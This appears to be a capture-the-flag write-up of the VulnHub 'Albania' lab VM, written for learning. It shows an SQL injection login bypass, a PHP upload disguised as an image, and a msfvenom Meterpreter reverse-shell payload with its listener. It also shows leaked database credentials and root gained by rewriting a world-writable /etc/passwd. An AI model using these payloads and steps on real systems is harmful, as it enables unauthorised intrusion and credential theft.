Albania VulnHub Writeup
- Service discovery
- Port 8008
- vulnbank
- I'll take it..
- Time to elevate
- What do we have here?
- Onwarpds and upwards
- Last steps
- Summary
I've got a bit of time on my hands, so I decided to check out the most recent VM released on VulnHub - Albania
Service discovery
root@kali:~# nmap -T4 -A -v -p0-65535 192.168.110.101
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-03 06:29 EST
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Initiating ARP Ping Scan at 06:29
Scanning 192.168.110.101 [1 port]
Completed ARP Ping Scan at 06:29, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:29
Completed Parallel DNS resolution of 1 host. at 06:29, 0.02s elapsed
Initiating SYN Stealth Scan at 06:29
Scanning 192.168.110.101 [65536 ports]
Discovered open port 22/tcp on 192.168.110.101
Discovered open port 8008/tcp on 192.168.110.101
Completed SYN Stealth Scan at 06:29, 1.37s elapsed (65536 total ports)
Initiating Service scan at 06:29
Scanning 2 services on 192.168.110.101
Completed Service scan at 06:29, 6.02s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.110.101
NSE: Script scanning 192.168.110.101.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.23s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Nmap scan report for 192.168.110.101
Host is up (0.00033s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:76:a2:f0:82:5f:1f:75:0d:e4:c4:c5:a7:48:b1:58 (RSA)
|_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA)
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 26 disallowed entries (15 shown)
| /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/
| /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/
| /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/
|_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HackDay Albania 2016
MAC Address: 08:00:27:98:0D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.008 days (since Sat Dec 3 06:17:51 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 192.168.110.101
NSE: Script Post-scanning.
Initiating NSE at 06:29
Completed NSE at 06:29, 0.01s elapsed
Initiating NSE at 06:29
Completed NSE at 06:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.77 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65551 (2.623MB)
First I try to connect to ssh, to see if there are any interesting welcome messages for us.
Nope.. nothing. Moving swiftly on.
Port 8008
So from the nmap scan, it shows that there are a number of entries in the robots.txt file.
Visiting the target in a browser results in the following page.
Putting the phrase in the popup in to Google Translate results in the following. Unsurprisingly, it detects the language albanian.
MireseviniClose
If I am, I know where to go;)
Inspecting the source reveals the following comment.
<!--OK ok, por jo ketu :)-->
Turning to Google Translate again, it provides us with the following.
OK ok, but not here
Nothing much else to see in the response here.
Loading robots.txt gives us the following list.
Disallow: /rkfpuzrahngvat/
Disallow: /slgqvasbiohwbu/
Disallow: /tmhrwbtcjpixcv/
Disallow: /vojtydvelrkzex/
Disallow: /wpkuzewfmslafy/
Disallow: /xqlvafxgntmbgz/
Disallow: /yrmwbgyhouncha/
Disallow: /zsnxchzipvodib/
Disallow: /atoydiajqwpejc/
Disallow: /bupzejbkrxqfkd/
Disallow: /cvqafkclsyrgle/
Disallow: /unisxcudkqjydw/
Disallow: /dwrbgldmtzshmf/
Disallow: /exschmenuating/
Disallow: /fytdinfovbujoh/
Disallow: /gzuejogpwcvkpi/
Disallow: /havfkphqxdwlqj/
Disallow: /ibwglqiryexmrk/
Disallow: /jcxhmrjszfynsl/
Disallow: /kdyinsktagzotm/
Disallow: /lezjotlubhapun/
Disallow: /mfakpumvcibqvo/
Disallow: /ngblqvnwdjcrwp/
Disallow: /ohcmrwoxekdsxq/
Disallow: /pidnsxpyfletyr/
Disallow: /qjeotyqzgmfuzs/
Most of these bring back a page with the following image.
This includes the following phrase.
A eshte kjo direktoria e duhur.
Apo po harxhoj kohen kot
This translates to the following.
Is this the proper directory.
Or are jerk
One directory that returns a different response is /unisxcudkqjydw/. We receive the following.
IS there any /vulnbank/ in there ???
Before moving on, I work through the rest of the links. Nothing else of interest comes back.
vulnbank
Visiting /unisxcudkqjydw/vulnbank/ brings back a directory listing, with a single entry - a directory named client. Browsing to this directory brings us to a login form.
Specifying the username as test'" and the password as ing'" returns us a PHP MySQL error.
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/unisxcudkqjydw/vulnbank/client/config.php on line 102
Time to get lazy, and fire sqlmap at the target.
After some experimentation, it appears that initially only the username field is injectable. A run with the default settings in sqlmap returns no vulnerabilities. I tweak the options to increase the risk and level parameters, and hit gold.
root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 06:48:53
[06:48:53] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[06:48:53] [INFO] testing connection to the target URL
[06:48:53] [INFO] testing if the target URL is stable
[06:48:54] [INFO] target URL is stable
[06:48:54] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[06:48:54] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
[06:48:54] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[06:48:54] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[06:48:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:48:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[06:48:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[06:48:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[06:48:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[06:48:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT)'
[06:48:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[06:48:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[06:48:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)'
[06:48:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[06:48:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[06:48:58] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[06:48:58] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --not-string="102")
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:49:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[06:49:04] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[06:49:04] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[06:49:05] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1125 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=test' RLIKE (SELECT (CASE WHEN (3909=3909) THEN 0x74657374 ELSE 0x28 END))-- IuTM&password=ing
---
[06:49:06] [INFO] testing MySQL
[06:49:06] [INFO] confirming MySQL
[06:49:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18, PHP 7.0.8
back-end DBMS: MySQL >= 5.0.0
[06:49:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.101'
[*] shutting down at 06:49:06
After more digging, it seems that sqlmap is not able to extract any information from the target.
I fall back to dirsearch and see if there are any other intesting directories about.
root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/ -e php
_|. _ _ _ _ _ _|_ v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 5151
Error Log: /root/dirsearch/logs/errors-16-12-03_06-53-57.log
Target: http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/
[06:53:57] Starting:
[06:53:57] 403 - 334B - /unisxcudkqjydw/vulnbank/client/.ht_wsr.txt
[06:53:57] 403 - 327B - /unisxcudkqjydw/vulnbank/client/.hta
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htaccess-dev
[06:53:57] 403 - 337B - /unisxcudkqjydw/vulnbank/client/.htaccess.orig
[06:53:57] 403 - 338B - /unisxcudkqjydw/vulnbank/client/.htaccess-local
[06:53:57] 403 - 338B - /unisxcudkqjydw/vulnbank/client/.htaccess-marco
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htaccess.old
[06:53:57] 403 - 339B - /unisxcudkqjydw/vulnbank/client/.htaccess.sample
[06:53:57] 403 - 337B - /unisxcudkqjydw/vulnbank/client/.htaccess.bak1
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htaccess.BAK
[06:53:57] 403 - 337B - /unisxcudkqjydw/vulnbank/client/.htaccess.save
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htaccess.txt
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htaccessOLD2
[06:53:57] 403 - 335B - /unisxcudkqjydw/vulnbank/client/.htaccess_sc
[06:53:57] 403 - 338B - /unisxcudkqjydw/vulnbank/client/.htaccess_extra
[06:53:57] 403 - 337B - /unisxcudkqjydw/vulnbank/client/.htaccess_orig
[06:53:57] 403 - 335B - /unisxcudkqjydw/vulnbank/client/.htaccessOLD
[06:53:57] 403 - 335B - /unisxcudkqjydw/vulnbank/client/.htaccessBAK
[06:53:57] 403 - 333B - /unisxcudkqjydw/vulnbank/client/.htaccess~
[06:53:57] 403 - 336B - /unisxcudkqjydw/vulnbank/client/.htpasswd-old
[06:53:57] 403 - 331B - /unisxcudkqjydw/vulnbank/client/.htgroup
[06:53:57] 403 - 333B - /unisxcudkqjydw/vulnbank/client/.htpasswds
[06:53:57] 403 - 337B - /unisxcudkqjydw/vulnbank/client/.htpasswd_test
[06:53:57] 403 - 331B - /unisxcudkqjydw/vulnbank/client/.htusers
[06:54:02] 200 - 0B - /unisxcudkqjydw/vulnbank/client/config.php
[06:54:02] 200 - 0B - /unisxcudkqjydw/vulnbank/client/config.php
[06:54:03] 301 - 357B - /unisxcudkqjydw/vulnbank/client/images -> http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/images/
[06:54:03] 302 - 627B - /unisxcudkqjydw/vulnbank/client/index.php -> login.php
[06:54:03] 302 - 627B - /unisxcudkqjydw/vulnbank/client/index.php/login/ -> login.php
[06:54:04] 200 - 968B - /unisxcudkqjydw/vulnbank/client/login.php
[06:54:04] 200 - 968B - /unisxcudkqjydw/vulnbank/client/login.php
[06:54:07] 301 - 357B - /unisxcudkqjydw/vulnbank/client/upload -> http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/upload/
[06:54:07] 200 - 0B - /unisxcudkqjydw/vulnbank/client/upload/
Task Completed
Not much of interest in the images directory, apart from a troll image.
I run dirsearch against the upload directory (as visiting the directory on its own results in an empty result). No luck.. just a single hit for index.html.
Looks like we're going to have to succeed where sqlmap has failed.
Before giving up entirely on sqlmap, I note that it did not try to use any time based blind attacks, so I re-run the above command, specifying the technique as T.
root@kali:~# sqlmap -u 192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/login.php --data "username=test*&password=ing" --threads 10 --random-agent --risk 3 --level 5 --technique T
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 06:59:01
[06:59:01] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[06:59:02] [INFO] resuming back-end DBMS 'mysql'
[06:59:02] [INFO] testing connection to the target URL
[06:59:02] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
[06:59:02] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[06:59:02] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[06:59:02] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[06:59:03] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[06:59:03] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[06:59:04] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[06:59:04] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
sqlmap got a 302 redirect to 'http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/index.php'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
[06:59:58] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 RLIKE time-based blind' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[06:59:59] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: username=test' RLIKE SLEEP(5)-- smYE&password=ing
---
[07:01:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18, PHP 7.0.8
back-end DBMS: MySQL >= 5.0.12
[07:01:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.110.101'
[*] shutting down at 07:01:44
Looks hopeful.. I try retrieving some data, but no luck. What on earth is going on here?
I note that we were redirected to index.php when triggering the payload. Let's try entering the generated payload of username=test' RLIKE SLEEP(5)-- smYE as our username, and see why we're being redirected to index.php.
Uhhhh, what? Well, I'm not sure why this worked, but I'll take it. I'm sure we'll find out what is going on later on.
I'll take it..
Nothing much of interest on here, but we are able to open a ticket, which comes complete with a file input field.
I try and upload a simple php script, but am met with the following error.
After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc...
Dag-nabbit. Ok, let's rename our test script to info.jpg and see what happens.
As part of testing, I also added an img tag to both text input fields. It appears as if both fields are susceptible to XSS. This may come in handy later. It's also worth noting that my first ticket (when uploading a php file was added), but the upload did not succeed.
Visiting my second ticket (where I uploaded a file named info.php.jpg), I check the URL for the uploaded asset.
http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=info.php.jpg
Upon visiting the URL, I'm presented with the output of the phpinfo command!
Time to elevate
So we've gained the ability to upload and execute PHP code to the target. Let's generate a metasploit payload.
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.103 LPORT=4444 -f raw > shell.php
I create a new ticket with this as the asset - then I go and startup a listener in metasploit for the payload.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter_reverse_tcp
PAYLOAD => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.103
LHOST => 192.168.110.103
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.110.103:4444
[*] Starting the payload handler...
Finally, I trigger the payload by visiting http://192.168.110.101:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=shell.php.jpg
Just like magic..
[*] Meterpreter session 1 opened (192.168.110.103:4444 -> 192.168.110.101:41938) at 2016-12-03 07:25:01 -0500
What do we have here?
Time to figure out how the hell we logged in in the first place. I start a shell, and cat out the contents of login.php.
cat login.php
<?php
require("config.php");
echo header_template("SECURE Client Login");
if(isset($_POST['username'])){
$ID = check_login($_POST['username'],$_POST['password']);
if($ID >= 1){
session_start();
$_SESSION["id"] = $ID;
// echo 'succes';
header("Location: index.php");
}else{
echo invalid_login();
}
}else{
echo login();
}
?>
Ok - obviously the login function must be defined in config.php, so let's see what we've got. I cat out the contents of config.php, and find the check_login function.
function check_login($username,$password){
$username = str_ireplace("OR", "", $username);
$username = str_ireplace("UNION", "", $username);
$username = str_ireplace("AND", "", $username);
$password = str_ireplace("'","",$password);
$sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
$result = mysqli_fetch_assoc(execute_query($sql_query));
$result = $result["ID"];
if($result >= 1){
return $result;
}else{
return -1;
}
}
Ok - so we were unable to retrieve any data, because a number of key commands are stripped out. The reason that the username field is the only vulnerable parameter is because the ' character is stripped from the password field.
Looking through the rest of the config.php file, we find the database credentials.
function execute_query($sql){
$db_host = "127.0.0.1";
$db_name = "bank_database";
$db_user = "root";
$db_password = "NuCiGoGo321";
// echo $sql;
$con=mysqli_connect($db_host,$db_user,$db_password,$db_name);
if(mysqli_connect_errno()){
echo "Failed to connect to MySQL: " . mysqli_connect_error();
die(0);
}
$response = mysqli_query($con,$sql);
mysqli_close($con);
return $response;
}
I setup a port forward in our meterpreter session.
meterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1
[*] Local TCP relay created: :3306 <-> 127.0.0.1:3306
I proceed to connect to the target mysql server.
root@kali:~# mysql -uroot -pNuCiGoGo321 -h127.0.0.1
The reason we were able to bypass the login using the RLIKE time based blind method is because the query actually returns all records, thanks to matching against the RLIKE keyword. I'm not entirely sure why this is - it certainly feels odd.
mysql> SELECT ID FROM klienti where `username` = 'test' RLIKE SLEEP(5)-- smYE' and `password` = 'test';
-> ;
+----+
| ID |
+----+
| 1 |
| 2 |
+----+
Therefor we are logged in as the user with the ID of 1.
Let's retrieve the rest of the entries from the database.
mysql> select * from klienti;
+----+-------------+---------+---------+----------+------------+
| ID | emer | mbiemer | bilanci | username | password |
+----+-------------+---------+---------+----------+------------+
| 1 | Charles D. | Hobson | 25000 | hobson | Charles123 |
| 2 | Jeffery
| Fischer | 120000 | jeff | jeff321 |
+----+-------------+---------+---------+----------+------------+
2 rows in set (0.00 sec)
So we've got a couple of user and password combinations for use later.
hobson:Charles123
jeff:jeff321
Onwarpds and upwards
Let's see if there are any system users that share a username with the above login details.
ls -lah /home
total 12K
drwxr-xr-x 3 root root 4.0K Oct 9 13:13 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 taviso
Damn, no such luck, but we do have a user called taviso, and their home directory is world readable.
ls -alh /home/taviso
total 32K
drwxr-xr-x 4 taviso taviso 4.0K Oct 29 23:07 .
drwxr-xr-x 3 root root 4.0K Oct 9 13:13 ..
-rw------- 1 root root 17 Oct 29 23:07 .bash_history
-rw-r--r-- 1 taviso taviso 220 Oct 9 13:13 .bash_logout
-rw-r--r-- 1 taviso taviso 3.7K Oct 9 13:13 .bashrc
drwx------ 2 taviso taviso 4.0K Oct 9 13:16 .cache
drwxrwxr-x 2 taviso taviso 4.0K Oct 29 23:07 .nano
-rw-r--r-- 1 taviso taviso 655 Oct 9 13:13 .profile
-rw-r--r-- 1 taviso taviso 0 Oct 29 23:07 .sudo_as_admin_successful
So looks like the taviso user might be in the sudoers group.
grep taviso /etc/group
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso
We need to get access to this user!
I start to explore the rest of the database. There's nothing else of interest in the current database (bank_database), so I move on to the other databases. There is another database named vulnbank, but it's simply an empty copy of the bank_database database. I check out the user listings for mysql, but nothing else of interest. This did make me laugh though.
mysql> select User,authentication_string from user;
+------------------+-------------------------------------------+
| User | authentication_string |
+------------------+-------------------------------------------+
| root | *EF810ED8A4380B74BCD0BE94774DB83CF9197F8C |
| mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *9C821206E17899E16AFF4B6740169000AC894873 |
+------------------+-------------------------------------------+
3 rows in set (0.01 sec)
Nice..
So we have the password for the root user on mysql. Let's see if that's shared by the system root user.
First we need a valid shell. python isn't available under the name of python, but is under python3. I get a valid shell, and then try to su to root.
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/var/www/html/unisxcudkqjydw/vulnbank/client$ su
su
Password: NuCiGoGo321
su: Authentication failure
No such luck - I didn't think it'd be that easy.
I couldn't find any useful binaries with their suid bit set, however I did find an interesting world writable file.
find / -perm -0002 -type f -print -xdev 2>/dev/null
/etc/passwd
/var/crash/.lock
Riiiight. I read up on the format of the /etc/passwd file in this blog post.
- Username: It is used when user logs in. It should be between 1 and 32 characters in length.
- Password: An x character indicates that encrypted password is stored in /etc/shadow file.
- User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
- Group ID (GID): The primary group ID (stored in /etc/group file)
- User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.
- Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
- Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.
I'll admit - I had no idea you could specify an account password in the /etc/passwd file. Every day is a school day!
I go about generating a new password for the taviso user (although I suppose we could change the password for any user), and updating the /etc/passwd file.
openssl passwd -1 -salt salt letmein
$1$salt$bvDqL29IXg3sPhjeBKC/./
cp /etc/passwd /tmp/passwd
sed -i -e 's/taviso:x:/taviso:$1$salt$bvDqL29IXg3sPhjeBKC\/.\/:/g' /tmp/passwd
cp /tmp/passwd /etc/passwd
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/$ su taviso
su taviso
Password: letmein
taviso@hackday:/$ id
id
uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
Last steps
Let's see what taviso can sudo.
taviso@hackday:/$ sudo -l
sudo -l
[sudo] password for taviso: letmein
Matching Defaults entries for taviso on hackday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
(ALL : ALL) ALL
Fair enough - it'd be rude not to.
taviso@hackday:/$ sudo su
sudo su
root@hackday:/# id
id
uid=0(root) gid=0(root) groups=0(root)
Time to get the flag!
root@hackday:/# cd /root
cd /root
root@hackday:~# ls -lah
ls -lah
total 28K
drwx------ 3 root root 4.0K Oct 22 17:21 .
drwxr-xr-x 23 root root 4.0K Oct 26 21:48 ..
-rw------- 1 root root 58 Oct 22 17:21 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw-r--r-- 1 root root 61 Oct 9 13:36 flag.txt
drwxr-xr-x 2 root root 4.0K Oct 9 13:18 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
root@hackday:~# cat flag.txt
cat flag.txt
Urime,
Tani nis raportin!
d5ed38fdbf28bc4e58be142cf5a17cf5
Summary
A nice fun VM here. I learnt something (about the /etc/passwd file), and had a good couple of hours playing about. Thank you R-73eN, and than you VulnHub for hosting it!